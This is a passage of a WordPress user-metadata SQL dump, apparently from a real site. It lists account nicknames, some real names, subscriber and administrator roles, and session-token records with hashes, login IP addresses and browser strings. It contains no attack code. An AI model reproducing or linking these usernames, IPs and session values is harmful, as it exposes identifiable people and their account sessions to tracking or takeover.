(26707, 2046, 'last_name', ''),
(26708, 2046, 'description', ''),
(6451, 488, 'nickname', 'prm03391994'),
(6452, 488, 'first_name', ''),
(6453, 488, 'last_name', ''),
(6454, 488, 'description', ''),
(6455, 488, 'rich_editing', 'true'),
(6456, 488, 'comment_shortcuts', 'false'),
(6457, 488, 'admin_color', 'fresh'),
(6458, 488, 'use_ssl', '0'),
(6459, 488, 'show_admin_bar_front', 'true'),
(6460, 488, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1764, 13, 'session_tokens', 'a:2:{s:64:"e4562b66e1766a565bbcc3ac8458a726b81403f404cd0fbf857bce65148e0de4";a:4:{s:10:"expiration";i:1497599115;s:2:"ip";s:13:"31.173.85.208";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0";s:5:"login";i:1497426315;}s:64:"f40e2eaa1a3390e91c1a26900547c06df82d22e2f1ba648e7a1face98148d0fc";a:4:{s:10:"expiration";i:1497751522;s:2:"ip";s:13:"195.154.61.47";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0";s:5:"login";i:1497578722;}}'),
(27043, 2072, 'nickname', 'sejal.badani2000'),
(27044, 2072, 'first_name', ''),
(27045, 2072, 'last_name', ''),
(27046, 2072, 'description', ''),
(27047, 2072, 'rich_editing', 'true'),
(27048, 2072, 'comment_shortcuts', 'false'),
(27049, 2072, 'admin_color', 'fresh'),
(27050, 2072, 'use_ssl', '0'),
(27051, 2072, 'show_admin_bar_front', 'true'),
(27052, 2072, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27053, 2072, 'cyb_user_level', '0'),
(27054, 2072, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(27055, 2072, 'default_password_nag', '1'),
(27056, 2073, 'nickname', 'ranger.rw631999'),
(27057, 2073, 'first_name', ''),
(27058, 2073, 'last_name', ''),
(27059, 2073, 'description', ''),
(27060, 2073, 'rich_editing', 'true'),
(27061, 2073, 'comment_shortcuts', 'false'),
(27062, 2073, 'admin_color', 'fresh'),
(27063, 2073, 'use_ssl', '0'),
(27064, 2073, 'show_admin_bar_front', 'true'),
(27065, 2073, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(27066, 2073, 'cyb_user_level', '0'),
(27067, 2073, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(1765, 5, 'cyb_dashboard_quick_press_last_post_id', '2801'),
(1766, 7, 'cyb_dashboard_quick_press_last_post_id', '2808'),
(1767, 11, 'cyb_dashboard_quick_press_last_post_id', '2741'),
(1768, 13, 'cyb_dashboard_quick_press_last_post_id', '2804'),
(1769, 10, 'session_tokens', 'a:6:{s:64:"39ccb2025540a3dde5a7053c1ab960f8c266ee8d1e27f8b3e530f05d09c52634";a:4:{s:10:"expiration";i:1497430032;s:2:"ip";s:14:"91.210.147.194";s:2:"ua";s:79:"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.2";s:5:"login";i:1497257232;}s:64:"2e0c023e1aa85ea3f72537f5a02adf1bc0cb4d9e23d7672f675ad9b8398f94d7";a:4:{s:10:"expiration";i:1497431262;s:2:"ip";s:14:"91.210.147.194";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1497258462;}s:64:"2032d9c54e2d92517081fab2918c72c4852e33535193ab41e9c0b48d7525d002";a:4:{s:10:"expiration";i:1497517470;s:2:"ip";s:14:"46.118.155.216";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1497344670;}s:64:"6cc67bdb3345aa89507b05dc034f5fd277dd5a4ebf3e38ac78c6f6e88d8a599d";a:4:{s:10:"expiration";i:1497518076;s:2:"ip";s:14:"46.118.155.216";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0";s:5:"login";i:1497345276;}s:64:"d793fbe041db7d898af292d6544f100d27ed1931d8777d6dcf1d119d92fb2b33";a:4:{s:10:"expiration";i:1497535750;s:2:"ip";s:13:"195.154.61.47";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0";s:5:"login";i:1497362950;}s:64:"3ab15079c893cc549c45164c0f25af7773f2b1ebe1079a1af2ddda1f211490c5";a:4:{s:10:"expiration";i:1497550317;s:2:"ip";s:12:"31.173.86.88";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0";s:5:"login";i:1497377517;}}'),
(29995, 2299, 'first_name', ''),
(29996, 2299, 'last_name', ''),
(29997, 2299, 'description', ''),
(29998, 2299, 'rich_editing', 'true'),
(29999, 2299, 'comment_shortcuts', 'false'),
(9792, 745, 'nickname', 'rachaelschleifer1999'),
(9793, 745, 'first_name', ''),
(9794, 745, 'last_name', ''),
(9795, 745, 'description', ''),
(9796, 745, 'rich_editing', 'true'),
(9797, 745, 'comment_shortcuts', 'false'),
(9798, 745, 'admin_color', 'fresh'),
(9799, 745, 'use_ssl', '0'),
(9800, 745, 'show_admin_bar_front', 'true'),
(9801, 745, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(9802, 745, 'cyb_user_level', '0'),
(9803, 745, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(9804, 745, 'default_password_nag', '1'),
(9947, 756, 'default_password_nag', '1'),
(9948, 757, 'nickname', 'scott.mcgrath1996'),
(6503, 492, 'nickname', 'lisarad61993'),
(6504, 492, 'first_name', ''),
(6505, 492, 'last_name', ''),
(6506, 492, 'description', ''),
(6507, 492, 'rich_editing', 'true'),
(6508, 492, 'comment_shortcuts', 'false'),
(6509, 492, 'admin_color', 'fresh'),
(6510, 492, 'use_ssl', '0'),
(6511, 492, 'show_admin_bar_front', 'true'),
(6512, 492, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(6513, 492, 'cyb_user_level', '0'),
(6514, 492, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(1922, 139, 'session_tokens', 'a:2:{s:64:"abdb9514002d02dd6bd4a378b7456c71a84b111d712aaf1c4857216abd81bbd9";a:4:{s:10:"expiration";i:1468077441;s:2:"ip";s:15:"107.175.116.150";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1466867841;}s:64:"dda8291f437b88f0cef4f0a2bbac514fe42457f0ebe043ea11040a0d0fbfa820";a:4:{s:10:"expiration";i:1468090133;s:2:"ip";s:13:"107.173.73.77";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1466880533;}}'),
(1770, 15, 'cyb_dashboard_quick_press_last_post_id', '2803'),
(1771, 12, 'cyb_dashboard_quick_press_last_post_id', '2807'),
(1772, 17, 'session_tokens', 'a:5:{s:64:"c007b7a9072ef2804a20a3b6d3a23634617a0fc0cf789dd63e2a00395eed2588";a:4:{s:10:"expiration";i:1495747127;s:2:"ip";s:14:"155.133.82.234";s:2:"ua";s:105:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1495574327;}s:64:"2781c82439b71952e5a974893fc4b09707f6c1c7e980bc4d2a08f1680e0a3ff9";a:4:{s:10:"expiration";i:1495813722;s:2:"ip";s:14:"155.133.82.234";s:2:"ua";s:105:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1495640922;}s:64:"b854ce3edebf75fdd46043c269c7b958dd2949b991e32de48bfcd0bb16ace36a";a:4:{s:10:"expiration";i:1495821072;s:2:"ip";s:14:"155.133.82.234";s:2:"ua";s:105:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1495648272;}s:64:"7988b7573df306fe09e48be336093a56ec7bb3c63f60b3c12447c5713e649f66";a:4:{s:10:"expiration";i:1495823485;s:2:"ip";s:12:"93.174.93.80";s:2:"ua";s:105:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1495650685;}s:64:"4137ae3b07e6b380c99ceae3122dd7492b9527d24d863bdc1b18cc3728c29039";a:4:{s:10:"expiration";i:1495854851;s:2:"ip";s:12:"93.174.93.80";s:2:"ua";s:105:"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36";s:5:"login";i:1495682051;}}'),
(9805, 746, 'nickname', 'christymc112010'),
(9806, 746, 'first_name', ''),
(9807, 746, 'last_name', ''),
(9808, 746, 'description', ''),
(9809, 746, 'rich_editing', 'true'),
(9810, 746, 'comment_shortcuts', 'false'),
(9811, 746, 'admin_color', 'fresh'),
(9812, 746, 'use_ssl', '0'),
(9813, 746, 'show_admin_bar_front', 'true'),
(9814, 746, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(9815, 746, 'cyb_user_level', '0'),
(9816, 746, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(9817, 746, 'default_password_nag', '1'),
(9931, 755, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(9932, 755, 'cyb_user_level', '0'),
(9933, 755, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(9934, 755, 'default_password_nag', '1'),
(9935, 756, 'nickname', 'memberservices1983'),
(9936, 756, 'first_name', ''),
(9937, 756, 'last_name', ''),
(9938, 756, 'description', ''),
(9939, 756, 'rich_editing', 'true'),
(9940, 756, 'comment_shortcuts', 'false'),
(9941, 756, 'admin_color', 'fresh'),
(9942, 756, 'use_ssl', '0'),
(9943, 756, 'show_admin_bar_front', 'true'),
(9944, 756, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(9945, 756, 'cyb_user_level', '0'),
(9946, 756, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(1773, 17, 'cyb_dashboard_quick_press_last_post_id', '2735'),
(1774, 9, 'session_tokens', 'a:5:{s:64:"d81694f04d0d0c30546253f381f4cf00b6f57324fe0b42b6e63aa2d75fc76b64";a:4:{s:10:"expiration";i:1497625433;s:2:"ip";s:12:"192.40.95.27";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36";s:5:"login";i:1497452633;}s:64:"809266a819f56b9181a7e63427a03d095039da08fe761321357e70c4eae18bef";a:4:{s:10:"expiration";i:1497630933;s:2:"ip";s:12:"46.165.221.5";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130331 Firefox/21.0";s:5:"login";i:1497458133;}s:64:"ab0b0bab881f03f75b020faef4a5c98f74cb6dce393af8342041d9f38e48c6dd";a:4:{s:10:"expiration";i:1497717492;s:2:"ip";s:15:"210.211.122.214";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36";s:5:"login";i:1497544692;}s:64:"b793bf296a8c6882ac43399ed427dd0e6a96754be6e4f5bf2d73b291d8a1be3f";a:4:{s:10:"expiration";i:1497717531;s:2:"ip";s:15:"210.211.122.214";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36";s:5:"login";i:1497544731;}s:64:"68d6d6b4170a0370af78efa533ecfb104888eda6a6a7bb490a9a7051c5fab3d4";a:4:{s:10:"expiration";i:1497739449;s:2:"ip";s:14:"37.115.191.239";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1497566649;}}'),
(47169, 3626, 'nickname', 'lorrainequezada'),
(47170, 3626, 'first_name', ''),
(47171, 3626, 'last_name', ''),
(47172, 3626, 'description', ''),
(47173, 3626, 'rich_editing', 'true'),
(9857, 750, 'nickname', 'timothybfoster1957'),
(9858, 750, 'first_name', ''),
(9859, 750, 'last_name', ''),
(9860, 750, 'description', ''),
(9861, 750, 'rich_editing', 'true'),
(9862, 750, 'comment_shortcuts', 'false'),
(9863, 750, 'admin_color', 'fresh'),
(9864, 750, 'use_ssl', '0'),
(9865, 750, 'show_admin_bar_front', 'true'),
(9866, 750, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(9867, 750, 'cyb_user_level', '0'),
(9868, 750, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(9869, 750, 'default_password_nag', '1'),
(9893, 752, 'cyb_user_level', '0'),
(9894, 752, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(9895, 752, 'default_password_nag', '1'),
(9896, 753, 'nickname', 'daveslater691964'),
(9897, 753, 'first_name', ''),
(9898, 753, 'last_name', ''),
(9899, 753, 'description', ''),
(9900, 753, 'rich_editing', 'true'),
(9901, 753, 'comment_shortcuts', 'false'),
(9902, 753, 'admin_color', 'fresh'),
(9903, 753, 'use_ssl', '0'),
(1914, 139, 'comment_shortcuts', 'false'),
(1915, 139, 'admin_color', 'fresh'),
(1916, 139, 'use_ssl', '0'),
(1917, 139, 'show_admin_bar_front', 'true'),
(1918, 139, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1919, 139, 'cyb_user_level', '0'),
(1920, 139, '_infusionsoft_contact_id', '69126'),
(1921, 139, 'default_password_nag', '1'),
(1775, 9, 'cyb_dashboard_quick_press_last_post_id', '2806'),
(1776, 8, 'session_tokens', 'a:4:{s:64:"bdb44af891374bad3f5dbbaaa06900a0699e80f8741c9bb7137a5ff7ae452f38";a:4:{s:10:"expiration";i:1497430829;s:2:"ip";s:14:"91.210.147.194";s:2:"ua";s:81:"Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1";s:5:"login";i:1497258029;}s:64:"fbadd4a2c5a5075febcede62738beb73289f26c8e105040f3f14309fd35c53ee";a:4:{s:10:"expiration";i:1497431262;s:2:"ip";s:14:"91.210.147.194";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1497258462;}s:64:"baa18b9bd8b2b4cd90de23482152528f9caae982f3bddf849938ea7991b6a7c4";a:4:{s:10:"expiration";i:1497517470;s:2:"ip";s:14:"46.118.155.216";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1497344670;}s:64:"ca3c52b52a7c8364fea2c97136794a474f3b50e83dc4ad74e244fa210061250d";a:4:{s:10:"expiration";i:1497518076;s:2:"ip";s:14:"46.118.155.216";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0";s:5:"login";i:1497345276;}}'),
(42215, 3239, 'nickname', 'oliviasolon1967'),
(42216, 3239, 'first_name', ''),
(42217, 3239, 'last_name', ''),
(42218, 3239, 'description', ''),
(42219, 3239, 'rich_editing', 'true'),
(42220, 3239, 'comment_shortcuts', 'false'),
(42221, 3239, 'admin_color', 'fresh'),
(42222, 3239, 'use_ssl', '0'),
(42223, 3239, 'show_admin_bar_front', 'true'),
(42224, 3239, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42225, 3239, 'cyb_user_level', '0'),
(42226, 3239, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(6542, 495, 'nickname', 'donlquach2003'),
(6543, 495, 'first_name', ''),
(6544, 495, 'last_name', ''),
(6545, 495, 'description', ''),
(6546, 495, 'rich_editing', 'true'),
(1777, 8, 'cyb_dashboard_quick_press_last_post_id', '2805'),
(1778, 130, 'nickname', 'jaredalbright2'),
(1779, 130, 'first_name', ''),
(1780, 130, 'last_name', ''),
(1781, 130, 'description', ''),
(1782, 130, 'rich_editing', 'true'),
(1783, 130, 'comment_shortcuts', 'false'),
(1784, 130, 'admin_color', 'fresh'),
(1785, 130, 'use_ssl', '0'),
(1786, 130, 'show_admin_bar_front', 'true'),
(1787, 130, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1788, 130, 'cyb_user_level', '0'),
(1789, 130, '_infusionsoft_contact_id', '67970'),
(1790, 130, 'default_password_nag', '1'),
(1791, 130, 'session_tokens', 'a:1:{s:64:"d98fd8621bfa73ae0f5b410ac747688ed86dbd553bb47d7cfb19be28be4fba39";a:4:{s:10:"expiration";i:1459739911;s:2:"ip";s:15:"117.177.250.152";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1458530311;}}'),
(1792, 4, 'cyb_dashboard_quick_press_last_post_id', '2809'),
(1793, 131, 'nickname', 'tamiguerrero159'),
(1794, 131, 'first_name', ''),
(1795, 131, 'last_name', ''),
(1796, 131, 'description', ''),
(1797, 131, 'rich_editing', 'true'),
(1798, 131, 'comment_shortcuts', 'false'),
(1799, 131, 'admin_color', 'fresh'),
(1800, 131, 'use_ssl', '0'),
(1801, 131, 'show_admin_bar_front', 'true'),
(1802, 131, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1803, 131, 'cyb_user_level', '0'),
(1804, 131, '_infusionsoft_contact_id', '68080'),
(1805, 131, 'default_password_nag', '1'),
(1806, 132, 'nickname', 'madeleinemerrick'),
(1807, 132, 'first_name', ''),
(1808, 132, 'last_name', ''),
(1809, 132, 'description', ''),
(1810, 132, 'rich_editing', 'true'),
(1811, 132, 'comment_shortcuts', 'false'),
(1812, 132, 'admin_color', 'fresh'),
(1813, 132, 'use_ssl', '0'),
(1814, 132, 'show_admin_bar_front', 'true'),
(1815, 132, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1816, 132, 'cyb_user_level', '0'),
(1817, 132, '_infusionsoft_contact_id', '68230'),
(1818, 132, 'default_password_nag', '1'),
(1819, 132, 'session_tokens', 'a:1:{s:64:"5dad05cfc117a82e42f887c75de14cc008511d8db8459652cb4fa53b3b17485e";a:4:{s:10:"expiration";i:1461874478;s:2:"ip";s:14:"104.144.110.86";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1460664878;}}'),
(1820, 133, 'nickname', 'celinalain27'),
(1821, 133, 'first_name', ''),
(1822, 133, 'last_name', ''),
(1823, 133, 'description', ''),
(1824, 133, 'rich_editing', 'true'),
(1825, 133, 'comment_shortcuts', 'false'),
(1826, 133, 'admin_color', 'fresh'),
(1827, 133, 'use_ssl', '0'),
(1828, 133, 'show_admin_bar_front', 'true'),
(1829, 133, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1830, 133, 'cyb_user_level', '0'),
(1831, 133, '_infusionsoft_contact_id', '68706'),
(1832, 133, 'default_password_nag', '1'),
(1833, 133, 'session_tokens', 'a:1:{s:64:"fa9b6e8cb52089c453d401190297158e94b8a30b284876fb0c0bd2a20d7206da";a:4:{s:10:"expiration";i:1465342598;s:2:"ip";s:15:"205.234.159.173";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1464132998;}}'),
(1834, 134, 'nickname', 'hoseadouglas015'),
(1835, 134, 'first_name', ''),
(1836, 134, 'last_name', ''),
(1837, 134, 'description', ''),
(1838, 134, 'rich_editing', 'true'),
(1839, 134, 'comment_shortcuts', 'false'),
(1840, 134, 'admin_color', 'fresh'),
(1841, 134, 'use_ssl', '0'),
(1842, 134, 'show_admin_bar_front', 'true'),
(1843, 134, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1844, 134, 'cyb_user_level', '0'),
(1845, 134, '_infusionsoft_contact_id', '68736'),
(1846, 134, 'default_password_nag', '1'),
(1848, 135, 'first_name', 'Shanon'),
(1849, 135, 'last_name', 'Dean'),
(1850, 135, 'description', ''),
(1851, 135, 'rich_editing', 'true'),
(1852, 135, 'comment_shortcuts', 'false'),
(1853, 135, 'admin_color', 'fresh'),
(1854, 135, 'use_ssl', '0'),
(1855, 135, 'show_admin_bar_front', 'true'),
(1856, 135, 'cyb_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(1857, 135, 'cyb_user_level', '10'),
(1858, 135, '_infusionsoft_contact_id', '68782'),
(1859, 135, 'dismissed_wp_pointers', 'wp360_locks,wp390_widgets,wp410_dfw,vc_pointers_backend_editor'),
(1861, 135, 'cyb_dashboard_quick_press_last_post_id', '3866'),
(1862, 135, 'cyb_user-settings', 'editor=html&edit_element_vcUIPanelWidth=749&edit_element_vcUIPanelLeft=295px&edit_element_vcUIPanelTop=22px&libraryContent=browse&urlbutton=none&align=left'),
(1863, 135, 'cyb_user-settings-time', '1513160267'),
(1864, 136, 'nickname', 'Shamin'),
(1865, 136, 'first_name', 'Shamin'),
(1866, 136, 'last_name', ''),
(1867, 136, 'description', ''),
(1868, 136, 'rich_editing', 'true'),
(1869, 136, 'comment_shortcuts', 'false'),
(1870, 136, 'admin_color', 'fresh'),
(1871, 136, 'use_ssl', '0'),
(1872, 136, 'show_admin_bar_front', 'true'),
(1873, 136, 'cyb_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(1874, 136, 'cyb_user_level', '10'),
(1875, 136, '_infusionsoft_contact_id', '68890'),
(1876, 136, 'dismissed_wp_pointers', 'wp360_locks,wp390_widgets'),
(1877, 136, 'session_tokens', 'a:1:{s:64:"7ed0057fb4593a79f3cc5350914b30232f6784ec8d24e19aa2d45368ca0db0e1";a:4:{s:10:"expiration";i:1465808337;s:2:"ip";s:14:"103.230.106.19";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36";s:5:"login";i:1465635537;}}'),
(1878, 136, 'cyb_dashboard_quick_press_last_post_id', '2337'),
(1879, 136, 'closedpostboxes_dashboard', 'a:1:{i:0;s:13:"vfb-dashboard";}'),
(1880, 136, 'metaboxhidden_dashboard', 'a:0:{}'),
(1881, 136, 'cyb_user-settings', 'editor=html'),
(1882, 136, 'cyb_user-settings-time', '1465635972'),
(1883, 137, 'nickname', 'dianaskaggs'),
(1884, 137, 'first_name', ''),
(1885, 137, 'last_name', ''),
(1886, 137, 'description', ''),
(1887, 137, 'rich_editing', 'true'),
(1888, 137, 'comment_shortcuts', 'false'),
(1889, 137, 'admin_color', 'fresh'),
(1890, 137, 'use_ssl', '0'),
(1891, 137, 'show_admin_bar_front', 'true'),
(1892, 137, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1893, 137, 'cyb_user_level', '0'),
(1894, 137, '_infusionsoft_contact_id', '68932'),
(1895, 137, 'default_password_nag', '1'),
(1896, 138, 'nickname', 'maricruzpigott9'),
(1897, 138, 'first_name', ''),
(1898, 138, 'last_name', ''),
(1899, 138, 'description', ''),
(1900, 138, 'rich_editing', 'true'),
(1901, 138, 'comment_shortcuts', 'false'),
(1902, 138, 'admin_color', 'fresh'),
(1903, 138, 'use_ssl', '0'),
(1904, 138, 'show_admin_bar_front', 'true'),
(1905, 138, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1906, 138, 'cyb_user_level', '0'),
(1907, 138, '_infusionsoft_contact_id', '69062'),
(1908, 138, 'default_password_nag', '1'),
(1923, 140, 'nickname', 'carysupple7780'),
(1924, 140, 'first_name', ''),
(1925, 140, 'last_name', ''),
(1926, 140, 'description', ''),
(1927, 140, 'rich_editing', 'true'),
(1928, 140, 'comment_shortcuts', 'false'),
(1929, 140, 'admin_color', 'fresh'),
(1930, 140, 'use_ssl', '0'),
(1931, 140, 'show_admin_bar_front', 'true'),
(1932, 140, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1933, 140, 'cyb_user_level', '0'),
(1934, 140, '_infusionsoft_contact_id', '69170'),
(1935, 140, 'default_password_nag', '1'),
(1947, 141, '_infusionsoft_contact_id', '69304'),
(1948, 141, 'default_password_nag', '1'),
(1951, 142, 'last_name', ''),
(1952, 142, 'description', ''),
(1953, 142, 'rich_editing', 'true'),
(1954, 142, 'comment_shortcuts', 'false'),
(1955, 142, 'admin_color', 'fresh'),
(1949, 142, 'nickname', 'brandytzi4'),
(1950, 142, 'first_name', ''),
(1956, 142, 'use_ssl', '0'),
(1957, 142, 'show_admin_bar_front', 'true'),
(1958, 142, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1959, 142, 'cyb_user_level', '0'),
(1960, 142, '_infusionsoft_contact_id', '69332'),
(1961, 142, 'default_password_nag', '1'),
(1962, 143, 'nickname', 'irishharney96'),
(1963, 143, 'first_name', ''),
(1964, 143, 'last_name', ''),
(1965, 143, 'description', ''),
(1966, 143, 'rich_editing', 'true'),
(1967, 143, 'comment_shortcuts', 'false'),
(1968, 143, 'admin_color', 'fresh'),
(1969, 143, 'use_ssl', '0'),
(1970, 143, 'show_admin_bar_front', 'true'),
(1971, 143, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1972, 143, 'cyb_user_level', '0'),
(1973, 143, '_infusionsoft_contact_id', '69342'),
(1974, 143, 'default_password_nag', '1'),
(1975, 143, 'session_tokens', 'a:1:{s:64:"5c9677f527cc5911bd6aaee388d1cfe0305cad56bb724698a2c5d98c9eb65088";a:4:{s:10:"expiration";i:1469665227;s:2:"ip";s:11:"69.12.81.47";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1468455627;}}'),
(53995, 4195, 'nickname', 'Matt Guevara'),
(53996, 4195, 'first_name', 'Matt'),
(53997, 4195, 'last_name', 'Guevara'),
(53998, 4195, 'description', ''),
(53999, 4195, 'rich_editing', 'true'),
(54000, 4195, 'comment_shortcuts', 'false'),
(1977, 4, 'cyb_user-settings', 'posts_list_mode=list'),
(1978, 4, 'cyb_user-settings-time', '1482108100'),
(1979, 144, 'nickname', 'porno741'),
(1980, 144, 'first_name', ''),
(1981, 144, 'last_name', ''),
(1982, 144, 'description', ''),
(1983, 144, 'rich_editing', 'true'),
(1984, 144, 'comment_shortcuts', 'false'),
(1985, 144, 'admin_color', 'fresh'),
(1986, 144, 'use_ssl', '0'),
(1987, 144, 'show_admin_bar_front', 'true'),
(1988, 144, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(1989, 144, 'cyb_user_level', '0'),
(1990, 144, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(1991, 144, 'default_password_nag', '1'),
(1992, 145, 'nickname', 'lawsonjordan261977'),
(1993, 145, 'first_name', ''),
(1994, 145, 'last_name', ''),
(1995, 145, 'description', ''),
(1996, 145, 'rich_editing', 'true'),
(1997, 145, 'comment_shortcuts', 'false'),
(1998, 145, 'admin_color', 'fresh'),
(1999, 145, 'use_ssl', '0'),
(2000, 145, 'show_admin_bar_front', 'true'),
(2001, 145, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(2002, 145, 'cyb_user_level', '0'),
(2003, 145, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
